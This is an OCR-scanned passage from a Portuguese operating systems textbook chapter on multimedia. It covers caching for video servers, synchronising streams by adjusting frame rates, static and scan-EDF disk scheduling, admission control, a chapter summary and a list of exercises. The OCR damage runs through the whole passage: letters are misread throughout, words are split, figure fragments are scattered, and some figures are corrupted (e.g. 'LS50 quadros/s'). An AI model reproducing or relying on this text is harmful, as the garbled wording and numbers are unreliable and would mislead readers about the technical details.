tięóes), mas a perda de um disco prejudica somente os fil¬ 
mes de sua partięao. A distribuięao de ąuadros de tamanho 
variavel e analisada matematicameme e em detalhes em 
Shenoy e Vin (1999). 



Caching 


A tecnica de cachi ng dc arqnivo LR U tradidonal nao 
fnnciona bem para arquivos innUimfdia, pois os pądroes 
de accsso a os filmes sao diferentes dos padroes de acesso 
aos arquivos com iexio. A ideia por tras da cache dc blocos 
LRU tradidonal ć que, depois de u sad o, um bloco dcve ser 
mamtdo na cache para o caso dc ser necessario novamen¬ 
te. Por excmplo, na edięao de um arquivo, o conjunlo de 
blocos no qual o arquivo esta escrito ten de a ser cada vez 
mais usado enąuanto durar a sessao de edięao. Em outras 
palavras, ąuando ha uma probabilidade relaiivamcutc alia 
de que um bloco seja reutilizado dentro de um peąucno 
intemlo de tempo, e melhor deixa-lo por perto para eltmi- 
nar um futuro acesso a disco* 

Para arquivos mulitmidia, o padrao norma t dc acesso e 
aąuele em ąuc um filme e yisto seąuencialmenie, do intcio 
ao firn. Difidlmente um bloco sera usado uma segunda vez, 
a menos que o usuario retroceda o filme para reyeralguma 
cena, Como conseąućncia, as tecnicas not mais de caching 
nao funcionam* Contudo, o caching pode ajudar, mas ape- 
nas se for emprega do de uma maneira difereme. Nas próxi- 
m.as scęocs estudaremos o caching para mnltimtdia. 
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7-8.1 I Caching de blocos 

Manter um bloco por perto, na esperanęa de quc dc 
possa ser reutilizado em breve, e iruitil. Contudo, a pre- 
visibiłidade dos sistemas multimfdia pode ser cxplorada 
para tornar o caching iiovamente iltil Suponha que dois 
usuarios estejam assistindo ao mesmo filme, com um ddes 
comeęando dois segundos após o outro. Depois que o pri- 
mdro usuario buscou e viu um determinado bloco, ć bem 
provavel que o segundo usuario precise do mesmo bloco 
dois segundos depois, O sistema pode facilmenie monitorar 
qual Hi me tem apenas um espectador e qual tern dois ou 
mais cspcciatiores qne estejam próximos ąuanio ao tempo. 

Assim, se um bloco for lido para um filme que em bre- 
ve sera nova menie neccssario, pode ter sciuido guarda-lo 
na cache, dependendo de quanto tempo de for mant ido la 
c da quantidade de memória que estiver sobrando. Em vcz 
de manier todos os blocos de disco na cache e descartar os 
inenos usados recentemente quando a caclie encher, inna 
ouira estraiegia deve ser usada. Todo Hlme que tiver um 
segimdo espectador, quc esta ha um tempo ibl do primeiro 
espectador, pode ser marcado para ser guardado na cache 
a te que um segundo (e possivełmente terceiro) espectador 
o ten ha assistklo. Para os outros filmes, a caclie nao ć usada. 

Essa ideia nao se limba a isso. Em alguns casos, pode 
ser viavel jumar dois fluxos. Suponha que dois usuarios 
estejam assistindo ao mesmo lii mc, mas com um a traso dc 
10 s de um para outro, Ć possfvel abrigar os blocos na cache 


por 10 s, mas isso consome memória. Uma estraiegia alter- 
nativa, porem ardilosa, e tentar sineronizar os dois filmes. 
Isso pode ser feito alterando-se a taxa de ąuadros dos dois 
filmes. Essa ideia esta ilustrada na Figura 7.24. 

Na Figura 7,24(3), os dois filmes sao reproduzidos 
nas iaxas do padrao NTSC de i .800 quadros/min. Como 
o usuario 2 comeęou dez segundos depois, ele continua 
dez segundos a frente ao longo de todo o filme. Na Figura 
7,24 (b), contudo, o fluxo do usuario l e atrasado enquanto 
o do usuario 2 e adiantado, Em vez de reproduzir 1.800 
quadros/min r nos tres minut os seguintes ele reproduzira 
em 1.750 quadros/imn. Depois dc tres minu tos, cle estara 
no quadro 5.550. Alem disso, o fluxo do usuario 2 passa a 
ser reproduzido em LS50 quadros/s nos primeiros tres mi¬ 
nut os, chegando tambćm ao ąuadro 5,550, A partir desse 
ponto, ambos rep rodu ze m em yelocidade norma!. 

Duranie o perfodo de ajuste, o lluxo do usuario 1 esta 
exccutando 2,8 por cent o mais lento e o fiuxo do usuario 
2 esta cxecutando 2,8 por cento mais rapido. E improvavel 
que os usuarios pcrccbam isso, Contudo, sc for iuteressan- 
te, o periodo de ajuste pode ser dist ii bindo ao longo de um 
perfodo superiora tres minutos, 

Um modo alternativo de atrasar um usuario para fum 
di-lo a outro fluso e dar aos usuarios a opęao de ter co- 
merciais em seus filmes, presu mi vel menie por um preęo 
mais baixo que os filmes sem comerriais, O usuario tam- 
bem pode escolher as categorias de produtos; assim, os co- 
merdais serao menos intrusivos e mais propensos a serem 
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I Figura 7.24 (a) Dois usu-arios assistindo ao mesmo filme dez segundos fora de sine ronią, (b) Juntando os dois fluxos em um. 
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assistidos. Manipulando o numero, o tamanho e o tempo 
dos comerdais, o fluxo podera ter uma duraęao sufidente 
para se sincronizarcom o fiiixo desejado (Krishnan, 1999), 

7.8.2 I Caching de arquivos 

A te cni ca de caching tambem pode ser util dc outra 
maneira cm sistemas multimfdia, Por causa do grandę la- 
manho da maioria dos EU mes (3-6 GB) P os semdores dc 
vfdeo iniiilas vezes nao podem armazenar todos os seus 
fil mes em disco e, porta nto, os mantem em DVD on em 
fita* Quando um filme lor necessario, sempre podera ser 
coplado para o disco. Conseąuentememe, a maioria dos 
servidores de vfdeo mantem uma cache de disco dos (limes 
mais reąuisitados. Os fil mes populares sao tolalmenie ar- 
mazenados no disco. 

Outro modo de usar a tćcnica de caching e manier 
os primciros cinco minutos de ca da filme no disco. Des- 
se modo, ąuando um filme for reąuisitado, a reproduęao 
podera comeęar imediatameme do arquivo em disco, En- 
quanto isso, o filme e coplado do DVD ou da fi ta para o 
disco. Armazenando uma parte su fi cienieniem e grandę do 
filme no disco o tempo todo faz com que a probabilidade 
dc que a próxima parte do filme seja buscada antes de ser 
neccssaria seja muito alta. Entao cssa parte ira para a cache 
c permanecera no disco caso haja mais reąuisięoes. Sc ficar 
muiio tempo sem reąuisięoes, o filme sera removido da ca- 
che para dar lugar a um outro filme mais popular. 



Escalonamento de disco para 
multimidia 


A multimidia impÓe exigencias aos discos diferentes 
das aplicaęoes iradicionais oriemadas a texto, como com- 
piladores ou processadores de 10 x 10 , Panicu la rmente, a 
muiiitnidia exige uma taxa de dados extremamente aha e 
disponibilidade de dados em tempo real. Men hu ma dessas 
exigencias e trivial. Alem disso, no caso de um servidor 
de video, ha uma pressao económica para que um imico 
servidor tratę milhares de dientes simultanea menie, Esses 
rcquisitos causam Impacto em todo o sistema. Anterior- 
mente vimos o escalonamento dc disco para o sistema de 
arquivos, Agora, estudaremos o escalonamento de disco 
para multimidia. 


7.9.1 I Escalonamento estatko de disco 

Embora a multimidia itnponha muitas exigendas de 
tempo real e de Laxa de dados para todas as parłeś do siste¬ 
ma, tambem existe uma propriedade que a torna mais faeil 
de lidar que os sistemas iradicionais: a previsibilidade. Em 
um sistema operacional tradidonal, as reąuisięoes sao feitas 
por bloeos de disco de uma maneira quase imprevisfvel. O 
melhor que o subsistema de disco pode fazer e realizar uma 
leitura antedpada de um bloco para cada arquivo aberto. 


Outra opęao seria esperar que as reąuisięoes cliegassem e 
só entao processa-Ias. Para a multimidia e diferente. Cada 
fluxo ativo exige do sistema uma carga bem definida e bas- 
tamę previsfvcl. Para uma reproduęao NTSC, a cada 333 ms P 
cada dientc qucr o próximo ąuadro do arquivo c o sistema 
tern 333 ms para forncccr todos os quadros (o sistema pre- 
cisa dc um buffer com pcio menos um ąuadro por fluxo F 
para que a busca do ąuadro k + I possa prosseguir em pa¬ 
ralelo com a rcproduęao do ąuadro k }. 

Essa carga previsivel pode ser usada para escalonar 
o disco usnndo algoritmos personaJizados para opera ęao 
multimidia. A seguir, considcrarcmos apenas um disco, 
mas a idcia tambem pode ser aplicada a varios discos. Para 
o cxcmplo dado, presumiremos que haja dez usuarios, 
cada um vcndo um filme diferente. Alem disso, tambem 
partiremos do press u post o de que todos os filmes tenham 
resoluęoes iguais, a mesma taxa de ąuadros e outras pro¬ 
priedade s iguais. 

Dependendo do restante do sistema, o computador 
pode ter dcz processos (um por fluxo dc vidco), ou um 
proccsso com dez threads, ou ainda um proccsso com 
um thread que lidc com os dez fluxos em altemanda ci rai- 
lar. Os detallies nao importam. 0 que conia e que o tempo 
e dwidido em cidos e que cada cięło e o tempo de um 
quadro (333 ms para NTSC e 40 ms para PAL). No inicio 
de cada ddo, e gerada uma reąuisięao de disco para cada 
usuario, conforme rnostra a Figura 7.25. 

Depois de chegadas todas as reąuisięoes no inicio do 
dclo, o disco sabe o quc fazer durante aquelc dclo. O disco 
tambem sabe quc nao ebegara outra reąuisięao enąuanto 
as quc cstivercm no ciclo nao forem processadas c o pró- 
ximo ciclo nao ten ha comeęado. Conseąuentemente, as 
reąuisięoes podem ser ordenadas de urna maneira ótima, 
provavclmcnte na orderu dos eilindros (cmhora. em algims 
ca sos, tambem seja coucebivel na ordem de setores), c en¬ 
tao ser processadas nessa ordem ótima. Na Figura 7.25, as 
reąuisięoes aparecem ordenadas por eilindro. 

A primeira vista P alguem pode pensar quc otimizar o 
disco assim nao adiantc nada, pois o importante seria o dis¬ 
co cumprir o prazo, nao importando se com 1 ms ou com 
10 ms a mais. Contudo, essa conclusao ć faha. Otimizan- 
do a busca dessa mancira, o tempo medio para proccssar 
cada reąuisięao e reduzido, o que significa que o disco, em 
media, pode tratar mais lluxos por ciclo. Em outras pala- 
vras P otimizar as reąuisięoes de disco do modo apresentado 
aumenta o numero de fil mes quc o senddor pode transmi- 
tir simultaneamente. O tempo que sobra 110 linai do ciclo 
tambem pode ser u sad o por qualquer reąuisięao de semęo 
que nati exija tempo real. 

Sc um senddor tivcr muitos fluxos P de vez cm ąuando 
sera pedido a ele que busque ąuadros em partes distames 
do disco e quc nao cumpra um prazo. Mas, enąuanto os 
prazos descumpridos forem raros o suficiente, des podem 
ser tolerados e, em troca, os fluxos podem ser tratados si- 
muItaneamenie. Perccba que o que imeressa e o nu me- 
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Fluxo 


Buffer para os quadros impares 
B uff er para os quactros pares 


Bloco requisitado 



92 130 160 204 281 326 410 466 524 701 

Ordem em que as reqursięfles de disco sao processadas- 


I Figura 7.25 Em um cido, cada fifme pede um ąuadro. 


ro de fluxos que estao sendo buscados. Ter dois on mais 
cliemes por fluxo nao afeta o desempenho do disco nem o 
escałona niemo. 

Para monter o fluxo de dados fluindo sem problemas 
para os cliemes, sao nccessarios dois buffers no seryidor. 
Dura me o cido L e usado um conjunto de buffers, um 
buffer por f!uxo. Q na udo o cido Lermina, o processo ou 
os processos de saida sao destSoąueados e pedem para 
transmitir o ąuadro 1. Ao mesmo tempo, chegam novas 
reąuisięoes para o ąuadro 2 de cada fifme (pode haver um 
thread de disco e um tbread de safda para cada fi lin e). Es- 
sas reąuisięoes devem ser satisfciias medianie o uso dc um 
segundo conjumo de buffers, pois os primciros ainda estao 
ocupados. Q uan do se i nicią o cido 3, o primeim conjunto 
de buffers esta livre e pode, entao, ser reulilizado para bus- 
car o ąuadro 3. 

Prosumimos que ha um cido por qnadro. Essa Umila- 
ęao nao e estritamente necessaria. Poderia havcr dois ri- 
dos por quadro para reduzir a ąnamidade dc espaęo para 
buffers, ao custo de duas vczes mais operaędes de disco. 
Da mesma maneira, poderiam ser buscados no disco dois 
ąuadros por cido (presumindo quc os pares de ąuadros se- 
jam com ig u os no disco), Esse projeto reduz pola metade 
o nu nici o dc operaęocs dc disco, ao custo de duplicar a 
ąuaniidade de espaęo cxigida para os buffers, Dependendo 
da disponMidade rclativa, do deseni pen ho c do custo da 
memória comparado com o custo de E/S dc disco, a esira- 
tegia ótima pode ser calcu lada c milizada. 

7.9.2 I Escalonamento dinamico de disco 

No escmplo anterior, partimos da hipótese dc que to- 
dos os fi lotos tem as resoluędcs iguais, a mesma taxa de 
ąuadros e outras propriedades iguais, Agora nao conside- 
raremos mais essa hipótese. Fil mes diferentes agora podem 
ter taxas de dados diferemes e, portamo, nao e possfvel ter 
um cido de 33,3 ms e uma busca de um ąuadro para cada 
fluxo. As reąuisięoes chegam ao disco mais ou menos alea- 
toriamente. 


Cada reąuisięao de leiuira cspecifica qual bloco deve ser 
lido e, aleni disso, em que i usianie o bloco e necessario — 
isto e„ o prazo. Para simplificar, presumiremos que o tempo 
rcal para servirealia reąuisięao seja o mesmo (ainda que isso 
nao seja verdade), Desse modo, podemos subtrair o tempo 
e spęd fi ca do para servir cada reąuisięao e calcular ąuando 
a reąuisięao pode ser inidada e ainda cumprir o prazo, Isso 
torna o modclo mais simplcs, pois o cscalonador do disco se 
preocupa com o prazo para escalonar a reąuisięao. 

Quando o sistema comeęa, nao ha reąuisięoes de dis¬ 
co pendentes. Quando chega a primeira reąuisięao, da e 
servida imediatameme. Enąuamo a primeira busca estiver 
acontecendo, outras reąuisięoes podem chegar c, assim, 
ąuando a primeira reąuisięao terminar, o driver do disco 
podera escolher qual reąuisięao processar. Alguma reąui¬ 
sięao e escolhida e iniciada, Quando a reąuisięao lermina, 
noyamente ha um conjumo de possiveis reąuisięoes: aąuc- 
las que nao foram escolhidas na primeira vez e as novas 
que chegaram enąuanto a segunda reąuisięao estava sendo 
processada. De modo geral, se uma reąuisięao dc disco ter- 
mina, o driver tem algum conjunto de reąuisięoes penden¬ 
tes entre as ąuais de deve escolher, A ąuestao e: qual algo- 
ritmo usar para selccionara próxima reąuisięao dc semęo? 

Dois fatores sao consi dera dos na seleęao da prósima 
reąuisięao de disco: os prazos e os cii ind ros. Do porno de 
vista do desempenho, manier as reąuisięoes ordenadas por 
rilirulros c empregar o a Igo ritmo do devador minimiza o 
tempo total de busca, mas pode fazer com que os eilindros 
distanies nao cumpram sens prazos, Do ponto de vista do 
tempo rcal, ordenar as reąuisięoes pdos ycncimentos dos 
prazos e proce ssa- los nessa ordem — o u seja, primeiro o 
prazo mais eurto — minimiza a possibilidade de descum- 
primento dos prazos, mas aumenta o tempo total de busca. 

Esses fatores podem ser combinados usando o algo- 
ritmo scan-EDF (Reddy e Wyllic, 1994). A ideia basi- 
ca desse algoritmo e reunir, em lotes, as reąuisięoes ąue 
apresentem prazos que estejam relativamenle próxinios 
do vencimento e processa-las na ordem de eilindros. Por 
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exemplo, considere a situaęao da Figura 7.26 e m t = 700. 
O driver de disco sabe que de Lem 11 reąnisięoes penden- 
tes para varios prazos e varios cilindros. Ele pode decidir, 
por exemplo, tratar como um lote as cinco reąuisięóes com 
prazos quc cstcjam para vencer, ordena-las pelo nu mero 
de cilindros c usar o algoritmo do clcvador para esses servi- 
ęos quc estao ordenados por cilindros. A ordcm seria en tao 
110, 330, 440, 676 e 680. Desde quc lodas as reąuisięóes 
cm łotes sejam atendidas antes de seus prazos vencerem, 
as ouiras reąuisięóes podem ser seguramente rearranjadas 
para minimizar o tempo lotal exigido para a busca. 

Se diferentes fhixos tivercm diferentes taxas dc dados, 
quando aparece um novo consumidor surge um grandc 
problenia, O consumidor deve ser ad mit ido? Se a admissao 
do consumidor fizcr com que outros fluxos descumpram 
seus prazos freąuememente, a resposta provavelniente 
sera na o* Ha dois modos de cakularse o consumidor de ve 
ser admitido on na o. Um deles consisie em presumir que 
cada consumidor precisa de uma certa ąuantidade media 
de recursos — por exemplo, largura de banda de disco, 
buffers de memória, tempo de CPU etc. Se houver recursos 
suficie mes para um consumidor mc di o, este sera admitido. 

O outro algoritmo e mais delalhado: consulta especifi- 
caniente o li lnie quc o novo consumidor quer e veriiica sua 
taxa de dados (pre-calculada), que e diferente para filmes 
em preto e branco e em cores, para desenhos animados ou 
filmados e ate mesmo para filmes romanticos e de guerra. 
Filmes romanticos contem cenas mais longas, com movi- 
inentos mais lentos c transięoes suaves entre as cenas, óti- 
mo para a compressao; ja os filmes de guerra contem eortes 
rapidos entre as cenas e aęoes rapidas. Portamo, muitos 
quadros I e poucos quadros P. Se o servidor tiver capaci- 
dade sufidente para aquele filme espectfico que o consu- 
midor quer, entao a admissao sera concedida; do contrario, 
ela sera negada. 


7.10 


Pesąuisas em multimfdia 


A multimfdia atualmente e um assunto da moda; 
portamo, tern sido objęto de mu i ta s pesąuisas. Yarias de- 
!a$ versam sobre conteudo, (erramentas de construęao e 


aplicaęoes, assumos que ultrapassam o escopo desie livro. 
Outro tópico popular e multimfdia e redes, o qual ta łu¬ 
bem foge do escopo deste livro. Trabalhos com seruidores 
multimfdia, espedalmenie os servidores distribuidos estao 
relacionados a sistemas operacionais (Sarhan c Das, 2004; 
Matthur c Mundur, 2G04; Zaia et ab, 2004), O supor- 
te dc sistema dc arquivos para multimfdia ta mb cm ć tema 
de pesąuisa na comunidade de sistemas operacionais (Alin 
et ab, 2004; Cheng et ab, 2005; Kang et ab, 2006; Park e 
Ohm, 2006). 

Uma boa codificaęao dc audio c vfdeo (em cspecial para 
as aplicaęoes 3D) c importamc para o alto desempenbo e r 
portanto, esses tópicos saoalvo dc pesąuisa (Chatlopadhyay 
et ab, 2006; Han ct ab, 2006; Kum e Mayer-Patel, 2006). 

A ąualidade do servięo e importante nos sistemas mul* 
limfdta, e o tópico atrai certa atenęao dos pesąuisadores 
(Childs c Ingram, 2001; Tamai et ab, 2004). Reladonado a 
ąualidade do scrvięo est<i o escalonamento, tanto da CPU 
(Etsion ct ab, 2004; Etsion et ab, 2006; Nich e Lam, 2003; 
Yuan c Nahrstcdt, 2006) ąuamo do disco {Lund c GocbcL 
2003; Reddyet aL 2005). 

Seguranęa e um tema importante ąuando considera- 
mos os pr ogra mas de transmissao para clientes pa gam es e 
tambem tem atrafdo atenęao (Barni, 2006), 


7.11 


Resumo 


Multimfdia ć unia aplicaęao potencial para computa- 
dores. Como os arquivos multimfdia sao miii to grandes e 
sous rcąuisitos dc rcproduęao cm tempo rcal sao estritos, 
os sistemas projetados para iexto nao sao ideais para tmil- 
timidia. Os arquivos multimfdia consistem de varias trilhas 
paraldas, normalnie nie uma de vfdeo e pelo mc nos uma 
de audio e algumas vezes trilhas de iegendas tambem, Es- 
sas trilhas devem ser sineronizadas duranie a reproduęao. 
O audio e gravado amostrando-se o vo!ume perlodicamen¬ 
ie — em geral 44.100 amostras/s (para som com qualidade 
de CD). A compressao pode ser aplicada ao sinal de audio, 
oferecendo uma taxa de compressao uniforme de aproxi* 
madamente dcz vezes. A compressao de vfdeo usa tanto 
a compressao mtraąuadros (JPEG) ąuanto a intcrąuadros 



I Figura 7.26 O algoritmo scan-EDF usa prazos e numeros de cilindros para o escalonamento. 
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(MPEG). Esia ultima representa os quadros P como dife- 
renęas do quadro anterior. Os quadros B podem ser basea- 
dos tanio no quadro amerior ąuanto no quadro seguinte. 

A multimidia reąuer csealonamemo em tempo real 
para cumprir sens prazos. Normalmente sao u sad os dois 
algoritmos. O primeiro e o escalonamento monotonico de 
taxas {ratę monotonie $cheduling — KMS) — um algoritmo 
preemptivo que atribrn prioridades constantes aos proces¬ 
sos com ba se em sens pe riod os. O segundo e o prazo mais 
anto primeiro (EDF), um algoritmo dinamico que sem- 
pre escolhe o processo com o mc nor prazo, O EOF e mais 
complicado, mas pode alcanęar 100 por ccntn de utilizaęao, 
algo quc o RMS nao consegue. 

Os sistemas de arquivos mullimfdia cosiumam usar 
um moddo push e nao o moddo puli Urno vez inidado o 
lliiso, os bits dcixam o disco sem rcątiisięocs adidonais do 
usuario. Essa tatica e radicalmente di terenie dos sistemas 
operacionais conycndonais, masę necessaria para a tender 
aos requisitos de tempo real. 

Os arquivos podem ser armazenados de maneira eon- 
tigua ou nao. No ultimo caso, a unidadc pode ter tamanho 
variavcl (um bloco contćm um quadro) ou tamanho fixo 
(urn bloco centem muitos ąuadros). Essas eslrategias tern 
diferentes com prom issos. 

A alocaęao de arqnivos em um disco iiiflui no desem- 
penho. Quando ha varios arquivos f algimias vezcs ć usado 
o algoritmo do tubo dc órgao. E comum a distribuięao dc 
arquivos por varios discos, ampla ou resirila. As eslrategias 
de cadiing por arquivos e por blocos tambem sao ampla - 
menie empregadas para melhorar o desempenho. 

Problemas 

1. Um sina! de tdevkao NTSC em pieto e brance pode ser 
enviado pela Fast Ethernet? Em caso afirmatieo, quantos 
ca nah sim u 1 la n e o men te? 

2. A HDTV tem o dobro da resoluęao horizomal de uma TV 
convenrional (1.280 ver$m 6 40 pixels), Usando a infor- 
maęao fornecida no iexio, quantas vtv.es mais largura de 
banda requer a HDTV em rdaęao a TV convendona]? 

3- Na Figura 7.2, ha arquivos separados para avanęo c rciro- 
cesso rapido, Sc um servidor dc vtdco tambem suportar 
camera lenta, ć necessario outro arquivo para o avanęo 
em camera lenta? E para o rctroecsso em camera lenta? 

4* Um smal sonoro e amostrado usando um numero de 16 
bits (um bit de sinal, 15 bits de magnitude). Qual e o rut' 
do maximo de ąuantizaęao em porcentagem? Esse pro- 
bierna e maior para eoncertos de fłauta, para sbows de 
rock ou e o mesmo para ambos? Justifiąue sua resposta. 

5, Um estudio e capaz de fazer uma gravaęao digital a partir 
do som original usando urna arnostragem de 20 bits, A 
distribuięao finał aos ouvintes usara 16 bits. Sugira um 
modo dc reduzir o efeito do rufdode quantizaęao e discu- 
ta as vantagens e as desvantagens de sen esquema. 


6. A transformato DCT emprega ura bloco de 8 x 8; no 
entanto, um algoritmo usado para compensaęao de mo- 
yimento usa um bloco de 16 x 16. Essa diferenęa causa 
problemas? Em caso afirmatWo, como des sao resolvidos 
no MPEG? 

7. Na Figura 7.9, vimoscomoo MPEG funciona corrt um fun¬ 
do estaaonario e um a tor em movi niemo. Suponha que 
um video MPEG seja feito a partir de uma cena na qual 
a camera esteja montada em um tripe e se desloąue len- 
tamentc da csqucrda para a di rei ta a uma velocidadc que 
minca permiia quedoisquadros con$ecutivossęjam iguais, 
Todos os quadros agora devcm ser quadros I? Por que? 

S. Suponha que cada um dos tres processos da Figura 7,12 
seja acompanhado de um processo que su porte um flu- 
xo de audio reproduzindo com o mesmo periodo que sen 
processo de video. Assim, os butfers de audio podem ser 
atualizados entre os quadros de vfdeo. Todos esses tres 
processos de audio sao i den ii cos, Q u anto tempo dc CPU 
esui dlsponfvel para cada simo de um processo de audio? 

9, Dois processos de tempo real eslao executando em um 
computador. O primeiro executa por 10 ms a cada 25 ms, 
O segundo executa por 15 ms a cada 40 ms. O RMS fun¬ 
do na ra sempre para esses processos? 

10. A CPli de um semdor de video tern uma milizaęao de 65 
porcento. Quantos fil mes esse servidor pode cxibir usan- 
do o escalcmamento RMS? 

11. Na Figura 7.14, o EOF mantem a CPU 100 por cenio do 
tempo ocupada ate i - 150, Ele nao pode manier a CPU 
ocupada indefinidamenie porque, para a CPU, ha somen- 
te 975 ms de irabaiho por segundo, Esienda a figura para 
alem dos 150 ms e determine quando a CPU fica ociosa 
pela primeira vez com o EDF. 

12. Um DVD pode conter dados sufkiemes para um filmc 
completo c sua taxa dc transferencia c adequada para cxi- 
bir um program a em qualidade de TY. Por puc nao usar 
u ma farm de muitas unidades de DYD como fonte de da- 
dos para um servidor dc vfdeo? 

13. Os opera do res de um sistema de video quase sob deman- 
da descobriram que pessoas de uma cena cidade nao 
go siani dc esperar mais de seis minutos pelo Infcio dc 
um Finie, Dc quantos fluxos paralclos clcs pmcisam para um 
fil me de tres ho ras? 

14. Considere um sistema que use o esquema de Abram-Pro- 
feia e Shin no qual o operador do sereidor de vfdeo quer 
quc os clientcs sejam capazcs dc hitscar localmcntc por 
um minuto a frente e um minuto para tras. Presumindo 
que o fluxo de video seja MPEG-2 em 4 Mbps, quanto 
espaęo cm buffer cada dieme devc ter localmente? 

15. Considere os metodos de Ab ram-Pro feta e Shin, Sc o usua¬ 
rio tiver uma memória RAM de 50 MB que pode ser uti- 
1 i za da como buffer, qual o valor de AT dado um fluxo de 
videt> de 2 Mbps? 

16. Urn sistema de video sob demanda para ItDTY usa o mo¬ 
delu de blocospeąuenos da Figura 7.ł9(a) com um bloco 
dc disco dc 1 KB. Sc a rcsoluęao do vidco for dc L2&0 x 
720 e o fluxo de dados for de 12 Mbps, quanto espaęo em 
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disco sera cunsumido pela Iragmentaęao interna em uni 
filme de duas horas usando o NTSC? 

17. Considcre o esąuema de alocaęao de mcmoria da Figura 
7J9(a) para o NTSC c para o PAL, Para um tamanho cs- 
pecifico de bloco de disco e de filme, um deles sofre mais 
fragmemaęao interna que o outro? Em caso afirmathro, 
ąual e o me]hor e por que? 

1®. Considcre as duas alternativa$ mostradas na Figura 7,19. 
Adotar a HDTV favoreee um dcsses sistemas cm relaęao 
ao outro? Discuta, 

19. Considcre um sistema com um bloco de disco de 2 KB 
armazenando um filme de duas horas de duraęao no sis- 
tema PAL, com urna media de 16 KB por quadro. Qual ć 
o desperdfcio medio deespaęo se utilizarmos o modelo de 
a rn i a zen a m en to dc b! ocos pcq u e n o s? 

20. No excmp3o anterior, sc cada entrada de ąuadro dcmanda 
8 bytes, dos ąuais I by te e utilizado para indicar o nu mero 
dc blocos dc disco por ąuadro, qual o maior tamanho de 
filme possfvet a ser a rma żenad o? 

21. O esąuema de servidor de v1deo quase sob dema uda de 
Chen e Thapar funciona melhor ąuando cada ąuadro e do 
mesmo tamanho. Suponha quc um filme seja exlbido cm 
24 fluxos simultaneOS e que itm a cada dez ąuadros seja 
um ąuadro L Presuma larnbem quc os ąuadros I sejam 
dez vczcs maiores que os ąuadros E Os ąuadros 8 sao do 
mesmo tamanho dos ąuadros P, Qual e a próba bil i da de 
de um buffer igual a 4 ąuadros I e 20 ąuadros P nao ser 
suficiememente grandę? Yoce acha ąue esse tamanho de 
buffer e aceitavel? Torne o problema tratavei, presumm- 
do ąue esses tipos de ąuadro sejam a katona e indepen- 
deniemenie distribuidos pelos fluxos. 

22. Para o metodo de Chen e Thapar, dado ąue 5 trilhas reąue- 
rcm 8 ąuadros L 35 das trilhas rcąucrcm 5 ąuadros L 45 
das trilhas reąuerem 3 ąuadros 1 e 1 5 dos ąuadros dcman- 
dam de 1 a 2 ąuadros, qual deve ser o tamanho do buffer 
se ąuisermos garamir ąue 95 dos ąuadros ca bera o u cle? 

23. Para o metodo de Chen e Thapar, considcre que um filme 
de 3 horas codificado no sistema PAL precise ser transmi- 
lido a cada 15 minutom Quantos fluxos concorrcntcs sao 
neccssarios? 

24* O resultado finał da Figura 7.17 e que o ponto de exibi- 
ęao nao esta mais no mcio do buffer, Crie um esąuema 
ąue detxe o ponto de exibięao pelo me nos cinco minut os 
antes e cinco mi mu os depois, Faęa ąuaisąuer hipóteses 
razoaveis, mas e$tabckęa-as explic!tamente. 

23. O projeto da Figura 7,18 rcąucr ąue as trilhas dc i od os os 
idiomas sejam lidas para cada ąuadro. Suponha ąue os pro- 
jetistas dc um servidor dc vfdeo tenham de suportar um 
grandę mimero de linguagens, mas que eles nao ąueiram 
dedicar tama RAM para os buffers comendo cada ąuadro. 
Quais outras aliemativas estao disponfveis e ąuais sao as 
vamagens e as desvaniagens de cada u ma? 

26. Um peąucno scrvidor dc vidco tern oito filmes, Qual a 
previsao da lei dc Zip fi cm termos dc próba bi li dadc, para 
o filme mais popular, para o segundo mais popular c as- 
sim por dianie, ate o filme menos popular? 


27. Um disco de 14 GB com mil ctlindros e usado para abrigar 
mil videoclipes MPEG-2 de 30segundos reproduzindocm 
4 Mbps. Eles sao armazenados de acordo com o algoritmo 
do tubo de órgao. Frcsumindo a lei dc ZipL ąual fraęao dc 
tempo o braęo do disco gastarn nos dez ci li nd ras centra is? 

28. Presumindo ąue as demandas relativas pelos fil mes A, B t 
Ce D sejam descritas pela lei de Zipf, ąual e a utilizaęao 
relativa es pc rad a dos ąuatro discos da Figura 7,23 para os 
ąuatro metodos de drsiribuięao mostrados? 

29. Dois consumidorcs dc vfdeo sob dema lida comeęaram a 
assistir ao mesmo filme PAL sępa rad os por um internie 
de 6 s, Se o sistema adianta um f!uxo e atrasa o outro para 
juma-los, ąual e a porcentagem de adiantamemo/atraso 
nccessaria para junta-los derttro de ir6s minutos? 

30. Um servidor de video MPEG-2 usa o esąuema de dclos 
da Figura 7,25 para vidco KTSC, Todos os vfdeos vem dc 
um u nic o disco Ultra Wide SCSI de 10.800 rpm e com um 
tempo medio de busca dc 3 ms. Quamos fluxos podcm ser 
su port a dos? 

3!. Repita o problema anterior, mas agora presuma que o 
scan-EDF rediiz o tempo medio de busca em 20 por cen- 
to. Agora, ąuantos fluxos podcm ser snportados? 

32. Considcre a seąuencia a segtiir de solidtaębes do disco, 
Cada solicitaęao e represemada por urna tupią (Prazo 
em MS, Cii ind ro). O algoritmo scan-EDF e uliiizado e os 
ątiatro prazos segtitmcs sao agrupados c processados. Se 
o tempo medio de proces samem o de cada sol i ci ta ęa o e 
6 ms, alg u ni dos prazos se perde? 

(32, 300); (36, 500); (40, 210); (34, 310) 

Presuma que o tempo real e 15 ms. 

33. Repita o problema anterior mais urna vez, mas agora 
press u pond o ąue cada ąuadro es lej a disiribufdo por ąua¬ 
tro discos, com o scan-EDF reduzitido 20 por ccmo cm 
cada disco. Agora, ąuantos fluxos podcm ser suporiados? 

34. Com base cm um lotc de cinco reąuisiędes dc dados, o 
texto descreve o escalonamenio da situaęao descrita na 
Figura 7.26(a). Se lodas as reąutsiędes levarcm a mes ma 
ąuamidade de tempo, ąual sera o tempo maximo penni- 
tido, por reąuisięao, nesse exemplo? 

35. Muitas das imagens de mapas de bits ąue sao forned- 
das para gerar o 'papci dc paredc" do coniputador usani 
poitcas cores e sao facilmente comprimidas. Utn esąue- 
nia simples de compressao e o seguime: escolha um valor 
de dado quc nao aparcęa no arquivo dc cni rada e use-o 
como um sinalizador. Lei a o arquivo, by te por by te, bus- 
cando valorcs dc bytc repetidos, Copic os valorcs unicos 
e os repetidos ate tres vezes, diretamente no arquivo de 
safda, Quando for en eon trąd a unia cadeia de caracteres 
repet i da de ąuatro o u mais bytes, escreva, no arquivo de 
saida, urna cadeia de tres bytes consistindo no bytc sina¬ 
lizador, em um byle indicando unia comagem de 4 a 255 
e o valor real eneontrado no arquivo de entrada. Escreva 
um program a de compressao usando esse algoritmo e um 
programa de descompressao ąue restaure o orąuivo ori- 
ginal. Rcsponda: como vocć trata arquivos que contem o 
byle sinalizador em seus dados? 
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36. A animaęao por computadores e feita exibmdo-sc inna 
